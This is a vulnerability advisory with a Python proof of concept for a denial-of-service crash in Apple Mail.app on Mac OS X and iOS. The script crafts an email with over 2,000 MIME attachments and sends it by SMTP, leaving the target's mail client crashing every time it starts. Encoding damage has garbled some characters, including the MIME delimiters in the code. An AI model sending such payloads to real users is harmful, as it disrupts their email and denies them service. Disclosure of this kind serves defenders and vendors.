OVERVIEW
Mail.app mail client is vulnerable to a DoS by sending a crafted email.
VENDOR
Apple Inc.
Vendor contacted: 25 July 2011
Vendor reply: 20 September 2011.
Vendor's actions: Details confidential.
VULNERABILITY DESCRIPTION
Send an email with > 2023 MIME attachments to the vicim client. Upon parsing the attachments, the mail client crashes.
Impact: DoS
Type: Remote, by sending a crafted email. Buffer overflow on parsing MIME attachments.
Result: Mail.app crashes upon parsing the attachments, and produces a crash report.
Client leaves email on mail server, so it crashes again on the same mail at next startup.
Difficulty: I can teach it my mother.
VULNERABLE VERSIONS
All versions up to Mac OS X 10.7.2 on Intel. (Mail.app version 5.1)
At least the mail client on IOS 4.2.x, 4.3.3. (IOS 5.x untested)
Not vulnerable: Leopard on PPC
SOLUTION
β¦
MITIGATION
Some spam cleaners are capable of limiting the number of attachments.
CREDITS
shebang42
PROOF OF CONCEPT CODE
#!/usr/bin/env python
import smtplib
n_attach=2040 # ~2024 is sufficient
relay='your.mta.goes.here'
mailfrom = '[email protected]'
mailto = mailfrom
subject = 'PoC Apple Mail.app mail of death'
date = 'October 29, 2011 10:00:00 GMT'
def craft_mail():
header = 'From: %s\nTo: %s\nSubject: %s\nDate: %s\nContent-Type: multipart/mixed ; boundary="delim"\n\n' % (mailfrom, mailto, subject, date)
body = 'βdelim\nContent-Type: text/plain\nContent-Disposition: inline\n\nHello World\nBye Mail.app\n\n\n'
attach = 'βdelim\nContent-Disposition: inline\n\n'*n_attach
### Another, slightly longer option to crash Mail.app (same bug)
# attach = '--delim\nContent-Type: text/plain\nContent-Disposition: attachment; filename=AAAAAAAA\n\ncontent\n'*n_attach
return header + body + attach
def send_mail(mail):
server = smtplib.SMTP(relay)
server.sendmail(mailfrom, mailto, mail)
server.quit()
mail=craft_mail()
#print mail
send_mail (mail)